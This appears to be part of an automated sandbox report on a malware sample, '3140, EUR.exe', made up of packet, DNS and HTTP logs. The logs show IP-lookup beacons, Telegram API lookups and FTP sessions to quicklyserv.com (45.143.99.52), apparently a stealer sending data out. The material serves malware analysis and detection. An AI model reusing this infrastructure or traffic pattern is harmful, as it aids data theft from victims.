                                                          Sep 30, 2024 15:03:46.239696026 CEST214977845.143.99.52192.168.2.4
                                                          Sep 30, 2024 15:03:46.252085924 CEST4977821192.168.2.445.143.99.52
                                                          Sep 30, 2024 15:03:46.256874084 CEST214977845.143.99.52192.168.2.4
                                                          Sep 30, 2024 15:03:46.557590961 CEST214977845.143.99.52192.168.2.4
                                                          Sep 30, 2024 15:03:46.564357996 CEST4977821192.168.2.445.143.99.52
                                                          Sep 30, 2024 15:03:46.569477081 CEST214977845.143.99.52192.168.2.4
                                                          Sep 30, 2024 15:03:46.787847042 CEST214977845.143.99.52192.168.2.4
                                                          Sep 30, 2024 15:03:46.788162947 CEST4977821192.168.2.445.143.99.52
                                                          Sep 30, 2024 15:03:46.792934895 CEST214977845.143.99.52192.168.2.4
                                                          Sep 30, 2024 15:03:47.012161016 CEST214977845.143.99.52192.168.2.4
                                                          Sep 30, 2024 15:03:47.012475967 CEST4977821192.168.2.445.143.99.52
                                                          Sep 30, 2024 15:03:47.018241882 CEST214977845.143.99.52192.168.2.4
                                                          Sep 30, 2024 15:03:47.236392021 CEST214977845.143.99.52192.168.2.4
                                                          Sep 30, 2024 15:03:47.236560106 CEST4977821192.168.2.445.143.99.52
                                                          Sep 30, 2024 15:03:47.241447926 CEST214977845.143.99.52192.168.2.4
                                                          Sep 30, 2024 15:03:47.460988045 CEST214977845.143.99.52192.168.2.4
                                                          Sep 30, 2024 15:03:47.461606026 CEST4977953879192.168.2.445.143.99.52
                                                          Sep 30, 2024 15:03:47.466430902 CEST538794977945.143.99.52192.168.2.4
                                                          Sep 30, 2024 15:03:47.466519117 CEST4977953879192.168.2.445.143.99.52
                                                          Sep 30, 2024 15:03:47.466555119 CEST4977821192.168.2.445.143.99.52
                                                          Sep 30, 2024 15:03:47.471391916 CEST214977845.143.99.52192.168.2.4
                                                          Sep 30, 2024 15:03:47.995374918 CEST4975980192.168.2.4132.226.8.169
                                                          Sep 30, 2024 15:03:48.090451002 CEST214977845.143.99.52192.168.2.4
                                                          Sep 30, 2024 15:03:48.090974092 CEST4977953879192.168.2.445.143.99.52
                                                          Sep 30, 2024 15:03:48.091099024 CEST4977953879192.168.2.445.143.99.52
                                                          Sep 30, 2024 15:03:48.095794916 CEST538794977945.143.99.52192.168.2.4
                                                          Sep 30, 2024 15:03:48.096182108 CEST538794977945.143.99.52192.168.2.4
                                                          Sep 30, 2024 15:03:48.096390009 CEST4977953879192.168.2.445.143.99.52
                                                          Sep 30, 2024 15:03:48.134258986 CEST4977821192.168.2.445.143.99.52
                                                          Sep 30, 2024 15:03:48.144645929 CEST4978021192.168.2.445.143.99.52
                                                          Sep 30, 2024 15:03:48.150458097 CEST214978045.143.99.52192.168.2.4
                                                          Sep 30, 2024 15:03:48.150571108 CEST4978021192.168.2.445.143.99.52
                                                          Sep 30, 2024 15:03:48.314404011 CEST214977845.143.99.52192.168.2.4
                                                          Sep 30, 2024 15:03:48.368482113 CEST4977821192.168.2.445.143.99.52
                                                          Sep 30, 2024 15:03:48.778403997 CEST214978045.143.99.52192.168.2.4
                                                          Sep 30, 2024 15:03:48.778809071 CEST4978021192.168.2.445.143.99.52
                                                          Sep 30, 2024 15:03:48.783732891 CEST214978045.143.99.52192.168.2.4
                                                          Sep 30, 2024 15:03:48.996948004 CEST214978045.143.99.52192.168.2.4
                                                          Sep 30, 2024 15:03:48.997148991 CEST4978021192.168.2.445.143.99.52
                                                          Sep 30, 2024 15:03:49.002075911 CEST214978045.143.99.52192.168.2.4
                                                          Sep 30, 2024 15:03:49.243757963 CEST214978045.143.99.52192.168.2.4
                                                          Sep 30, 2024 15:03:49.253325939 CEST4978021192.168.2.445.143.99.52
                                                          Sep 30, 2024 15:03:49.258197069 CEST214978045.143.99.52192.168.2.4
                                                          Sep 30, 2024 15:03:49.471131086 CEST214978045.143.99.52192.168.2.4
                                                          Sep 30, 2024 15:03:49.477092028 CEST4978021192.168.2.445.143.99.52
                                                          Sep 30, 2024 15:03:49.481987000 CEST214978045.143.99.52192.168.2.4
                                                          Sep 30, 2024 15:03:49.694860935 CEST214978045.143.99.52192.168.2.4
                                                          Sep 30, 2024 15:03:49.695204020 CEST4978021192.168.2.445.143.99.52
                                                          Sep 30, 2024 15:03:49.699986935 CEST214978045.143.99.52192.168.2.4
                                                          Sep 30, 2024 15:03:49.916961908 CEST214978045.143.99.52192.168.2.4
                                                          Sep 30, 2024 15:03:49.917089939 CEST4978021192.168.2.445.143.99.52
                                                          Sep 30, 2024 15:03:49.922842026 CEST214978045.143.99.52192.168.2.4
                                                          Sep 30, 2024 15:03:50.136060953 CEST214978045.143.99.52192.168.2.4
                                                          Sep 30, 2024 15:03:50.136626959 CEST4978152160192.168.2.445.143.99.52
                                                          Sep 30, 2024 15:03:50.141398907 CEST521604978145.143.99.52192.168.2.4
                                                          Sep 30, 2024 15:03:50.141504049 CEST4978152160192.168.2.445.143.99.52
                                                          Sep 30, 2024 15:03:50.141524076 CEST4978021192.168.2.445.143.99.52
                                                          Sep 30, 2024 15:03:50.146423101 CEST214978045.143.99.52192.168.2.4
                                                          Sep 30, 2024 15:03:50.742501974 CEST214978045.143.99.52192.168.2.4
                                                          Sep 30, 2024 15:03:50.742798090 CEST4978152160192.168.2.445.143.99.52
                                                          Sep 30, 2024 15:03:50.742958069 CEST4978152160192.168.2.445.143.99.52
                                                          Sep 30, 2024 15:03:50.747652054 CEST521604978145.143.99.52192.168.2.4
                                                          Sep 30, 2024 15:03:50.748130083 CEST521604978145.143.99.52192.168.2.4
                                                          Sep 30, 2024 15:03:50.748188972 CEST4978152160192.168.2.445.143.99.52
                                                          Sep 30, 2024 15:03:50.790507078 CEST4978021192.168.2.445.143.99.52
                                                          Sep 30, 2024 15:03:50.961141109 CEST214978045.143.99.52192.168.2.4
                                                          Sep 30, 2024 15:03:51.009118080 CEST4978021192.168.2.445.143.99.52
                                                          Sep 30, 2024 15:04:00.043103933 CEST4978021192.168.2.445.143.99.52
                                                          Sep 30, 2024 15:04:00.048094988 CEST214978045.143.99.52192.168.2.4
                                                          Sep 30, 2024 15:04:00.260845900 CEST214978045.143.99.52192.168.2.4
                                                          Sep 30, 2024 15:04:00.261306047 CEST4978354464192.168.2.445.143.99.52
                                                          Sep 30, 2024 15:04:00.266557932 CEST544644978345.143.99.52192.168.2.4
                                                          Sep 30, 2024 15:04:00.266652107 CEST4978354464192.168.2.445.143.99.52
                                                          Sep 30, 2024 15:04:00.266684055 CEST4978021192.168.2.445.143.99.52
                                                          Sep 30, 2024 15:04:00.271516085 CEST214978045.143.99.52192.168.2.4
                                                          Sep 30, 2024 15:04:01.029295921 CEST214978045.143.99.52192.168.2.4
                                                          Sep 30, 2024 15:04:01.032809019 CEST4978354464192.168.2.445.143.99.52
                                                          Sep 30, 2024 15:04:01.032835007 CEST4978354464192.168.2.445.143.99.52
                                                          Sep 30, 2024 15:04:01.037620068 CEST544644978345.143.99.52192.168.2.4
                                                          Sep 30, 2024 15:04:01.038196087 CEST544644978345.143.99.52192.168.2.4
                                                          Sep 30, 2024 15:04:01.038254023 CEST4978354464192.168.2.445.143.99.52
                                                          Sep 30, 2024 15:04:01.071666956 CEST4978021192.168.2.445.143.99.52
                                                          Sep 30, 2024 15:04:01.251184940 CEST214978045.143.99.52192.168.2.4
                                                          Sep 30, 2024 15:04:01.305995941 CEST4978021192.168.2.445.143.99.52
                                                          TimestampSource PortDest PortSource IPDest IP
                                                          Sep 30, 2024 15:03:03.369647980 CEST5900553192.168.2.41.1.1.1
                                                          Sep 30, 2024 15:03:03.588587999 CEST53590051.1.1.1192.168.2.4
                                                          Sep 30, 2024 15:03:05.990294933 CEST5291853192.168.2.41.1.1.1
                                                          Sep 30, 2024 15:03:05.997092009 CEST53529181.1.1.1192.168.2.4
                                                          Sep 30, 2024 15:03:28.839507103 CEST6014453192.168.2.41.1.1.1
                                                          Sep 30, 2024 15:03:28.846379995 CEST53601441.1.1.1192.168.2.4
                                                          Sep 30, 2024 15:03:36.177577972 CEST6379653192.168.2.41.1.1.1
                                                          Sep 30, 2024 15:03:36.276360035 CEST53637961.1.1.1192.168.2.4
                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                          Sep 30, 2024 15:03:03.369647980 CEST192.168.2.41.1.1.10xe9e9Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                          Sep 30, 2024 15:03:05.990294933 CEST192.168.2.41.1.1.10xc94bStandard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                                          Sep 30, 2024 15:03:28.839507103 CEST192.168.2.41.1.1.10x58e4Standard query (0)api.telegram.orgA (IP address)IN (0x0001)false
                                                          Sep 30, 2024 15:03:36.177577972 CEST192.168.2.41.1.1.10xca1eStandard query (0)quicklyserv.comA (IP address)IN (0x0001)false
                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                          Sep 30, 2024 15:03:03.588587999 CEST1.1.1.1192.168.2.40xe9e9No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                          Sep 30, 2024 15:03:03.588587999 CEST1.1.1.1192.168.2.40xe9e9No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                          Sep 30, 2024 15:03:03.588587999 CEST1.1.1.1192.168.2.40xe9e9No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                          Sep 30, 2024 15:03:03.588587999 CEST1.1.1.1192.168.2.40xe9e9No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                          Sep 30, 2024 15:03:03.588587999 CEST1.1.1.1192.168.2.40xe9e9No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                          Sep 30, 2024 15:03:03.588587999 CEST1.1.1.1192.168.2.40xe9e9No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                          Sep 30, 2024 15:03:05.997092009 CEST1.1.1.1192.168.2.40xc94bNo error (0)reallyfreegeoip.org188.114.97.3A (IP address)IN (0x0001)false
                                                          Sep 30, 2024 15:03:05.997092009 CEST1.1.1.1192.168.2.40xc94bNo error (0)reallyfreegeoip.org188.114.96.3A (IP address)IN (0x0001)false
                                                          Sep 30, 2024 15:03:28.846379995 CEST1.1.1.1192.168.2.40x58e4No error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false
                                                          Sep 30, 2024 15:03:36.276360035 CEST1.1.1.1192.168.2.40xca1eNo error (0)quicklyserv.com45.143.99.52A (IP address)IN (0x0001)false
                                                          • reallyfreegeoip.org
                                                          • api.telegram.org
                                                          • checkip.dyndns.org
                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          0192.168.2.449734132.226.8.169807180C:\Users\user\Desktop\3140, EUR.exe
                                                          TimestampBytes transferredDirectionData
                                                          Sep 30, 2024 15:03:03.610894918 CEST151OUTGET / HTTP/1.1
                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                          Host: checkip.dyndns.org
                                                          Connection: Keep-Alive
                                                          Sep 30, 2024 15:03:05.617753029 CEST272INHTTP/1.1 200 OK
                                                          Date: Mon, 30 Sep 2024 13:03:05 GMT
                                                          Content-Type: text/html
                                                          Content-Length: 103
                                                          Connection: keep-alive
                                                          Cache-Control: no-cache
                                                          Pragma: no-cache
                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                                                          Sep 30, 2024 15:03:05.623363972 CEST127OUTGET / HTTP/1.1
                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                          Host: checkip.dyndns.org
                                                          Sep 30, 2024 15:03:05.914757013 CEST272INHTTP/1.1 200 OK
                                                          Date: Mon, 30 Sep 2024 13:03:05 GMT
                                                          Content-Type: text/html
                                                          Content-Length: 103
                                                          Connection: keep-alive
                                                          Cache-Control: no-cache
                                                          Pragma: no-cache
                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                                                          Sep 30, 2024 15:03:06.649216890 CEST127OUTGET / HTTP/1.1
                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                          Host: checkip.dyndns.org
                                                          Sep 30, 2024 15:03:07.936012030 CEST272INHTTP/1.1 200 OK
                                                          Date: Mon, 30 Sep 2024 13:03:07 GMT
                                                          Content-Type: text/html
                                                          Content-Length: 103
                                                          Connection: keep-alive
                                                          Cache-Control: no-cache
                                                          Pragma: no-cache
                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          1192.168.2.449738132.226.8.169807180C:\Users\user\Desktop\3140, EUR.exe
                                                          TimestampBytes transferredDirectionData
                                                          Sep 30, 2024 15:03:08.586637020 CEST127OUTGET / HTTP/1.1
                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                          Host: checkip.dyndns.org
                                                          Sep 30, 2024 15:03:10.431041956 CEST272INHTTP/1.1 200 OK
                                                          Date: Mon, 30 Sep 2024 13:03:10 GMT
                                                          Content-Type: text/html
                                                          Content-Length: 103
                                                          Connection: keep-alive
                                                          Cache-Control: no-cache
                                                          Pragma: no-cache
                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          2192.168.2.449740132.226.8.169807180C:\Users\user\Desktop\3140, EUR.exe
                                                          TimestampBytes transferredDirectionData
                                                          Sep 30, 2024 15:03:11.062177896 CEST151OUTGET / HTTP/1.1
                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                          Host: checkip.dyndns.org
                                                          Connection: Keep-Alive
                                                          Sep 30, 2024 15:03:12.264158010 CEST272INHTTP/1.1 200 OK
                                                          Date: Mon, 30 Sep 2024 13:03:12 GMT
                                                          Content-Type: text/html
                                                          Content-Length: 103
                                                          Connection: keep-alive
                                                          Cache-Control: no-cache
                                                          Pragma: no-cache
                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          3192.168.2.449741132.226.8.169807552C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe
                                                          TimestampBytes transferredDirectionData
                                                          Sep 30, 2024 15:03:11.064553976 CEST151OUTGET / HTTP/1.1
                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                          Host: checkip.dyndns.org
                                                          Connection: Keep-Alive
                                                          Sep 30, 2024 15:03:12.001118898 CEST272INHTTP/1.1 200 OK
                                                          Date: Mon, 30 Sep 2024 13:03:11 GMT
                                                          Content-Type: text/html
                                                          Content-Length: 103
                                                          Connection: keep-alive
                                                          Cache-Control: no-cache
                                                          Pragma: no-cache
                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                                                          Sep 30, 2024 15:03:12.005088091 CEST127OUTGET / HTTP/1.1
                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                          Host: checkip.dyndns.org
                                                          Sep 30, 2024 15:03:13.303366899 CEST272INHTTP/1.1 200 OK
                                                          Date: Mon, 30 Sep 2024 13:03:13 GMT
                                                          Content-Type: text/html
                                                          Content-Length: 103
                                                          Connection: keep-alive
                                                          Cache-Control: no-cache
                                                          Pragma: no-cache
                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                                                          Sep 30, 2024 15:03:14.494669914 CEST127OUTGET / HTTP/1.1
                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                          Host: checkip.dyndns.org
                                                          Sep 30, 2024 15:03:16.208565950 CEST272INHTTP/1.1 200 OK
                                                          Date: Mon, 30 Sep 2024 13:03:16 GMT
                                                          Content-Type: text/html
                                                          Content-Length: 103
                                                          Connection: keep-alive
                                                          Cache-Control: no-cache
                                                          Pragma: no-cache
                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          4192.168.2.449743132.226.8.169807180C:\Users\user\Desktop\3140, EUR.exe
                                                          TimestampBytes transferredDirectionData
                                                          Sep 30, 2024 15:03:12.931226969 CEST151OUTGET / HTTP/1.1
                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                          Host: checkip.dyndns.org
                                                          Connection: Keep-Alive
                                                          Sep 30, 2024 15:03:13.845216990 CEST272INHTTP/1.1 200 OK
                                                          Date: Mon, 30 Sep 2024 13:03:13 GMT
                                                          Content-Type: text/html
                                                          Content-Length: 103
                                                          Connection: keep-alive
                                                          Cache-Control: no-cache
                                                          Pragma: no-cache
                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          5192.168.2.449747132.226.8.169807180C:\Users\user\Desktop\3140, EUR.exe
                                                          TimestampBytes transferredDirectionData
                                                          Sep 30, 2024 15:03:14.497517109 CEST151OUTGET / HTTP/1.1
                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                          Host: checkip.dyndns.org
                                                          Connection: Keep-Alive
                                                          Sep 30, 2024 15:03:16.800672054 CEST272INHTTP/1.1 200 OK
                                                          Date: Mon, 30 Sep 2024 13:03:16 GMT
                                                          Content-Type: text/html
                                                          Content-Length: 103
                                                          Connection: keep-alive
                                                          Cache-Control: no-cache
                                                          Pragma: no-cache
                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          6192.168.2.449755132.226.8.169807552C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe
                                                          TimestampBytes transferredDirectionData
                                                          Sep 30, 2024 15:03:17.160518885 CEST127OUTGET / HTTP/1.1
                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                          Host: checkip.dyndns.org
                                                          Sep 30, 2024 15:03:20.142450094 CEST272INHTTP/1.1 200 OK
                                                          Date: Mon, 30 Sep 2024 13:03:20 GMT
                                                          Content-Type: text/html
                                                          Content-Length: 103
                                                          Connection: keep-alive
                                                          Cache-Control: no-cache
                                                          Pragma: no-cache
                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          7192.168.2.449756132.226.8.169807180C:\Users\user\Desktop\3140, EUR.exe
                                                          TimestampBytes transferredDirectionData
                                                          Sep 30, 2024 15:03:17.418443918 CEST151OUTGET / HTTP/1.1
                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                          Host: checkip.dyndns.org
                                                          Connection: Keep-Alive
                                                          Sep 30, 2024 15:03:20.679902077 CEST272INHTTP/1.1 200 OK
                                                          Date: Mon, 30 Sep 2024 13:03:20 GMT
                                                          Content-Type: text/html
                                                          Content-Length: 103
                                                          Connection: keep-alive
                                                          Cache-Control: no-cache
                                                          Pragma: no-cache
                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          8192.168.2.449759132.226.8.169807552C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe
                                                          TimestampBytes transferredDirectionData
                                                          Sep 30, 2024 15:03:20.778690100 CEST127OUTGET / HTTP/1.1
                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                          Host: checkip.dyndns.org
                                                          Sep 30, 2024 15:03:24.221577883 CEST272INHTTP/1.1 200 OK
                                                          Date: Mon, 30 Sep 2024 13:03:24 GMT
                                                          Content-Type: text/html
                                                          Content-Length: 103
                                                          Connection: keep-alive
                                                          Cache-Control: no-cache
                                                          Pragma: no-cache
                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          9192.168.2.449760132.226.8.169807180C:\Users\user\Desktop\3140, EUR.exe
                                                          TimestampBytes transferredDirectionData
                                                          Sep 30, 2024 15:03:21.278218031 CEST151OUTGET / HTTP/1.1
                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                          Host: checkip.dyndns.org
                                                          Connection: Keep-Alive
                                                          Sep 30, 2024 15:03:25.340111017 CEST272INHTTP/1.1 200 OK
                                                          Date: Mon, 30 Sep 2024 13:03:25 GMT
                                                          Content-Type: text/html
                                                          Content-Length: 103
                                                          Connection: keep-alive
                                                          Cache-Control: no-cache
                                                          Pragma: no-cache
                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          10192.168.2.449762132.226.8.169807552C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe
                                                          TimestampBytes transferredDirectionData
                                                          Sep 30, 2024 15:03:24.864725113 CEST151OUTGET / HTTP/1.1
                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                          Host: checkip.dyndns.org
                                                          Connection: Keep-Alive
                                                          Sep 30, 2024 15:03:27.489059925 CEST272INHTTP/1.1 200 OK
                                                          Date: Mon, 30 Sep 2024 13:03:27 GMT
                                                          Content-Type: text/html
                                                          Content-Length: 103
                                                          Connection: keep-alive
                                                          Cache-Control: no-cache
                                                          Pragma: no-cache
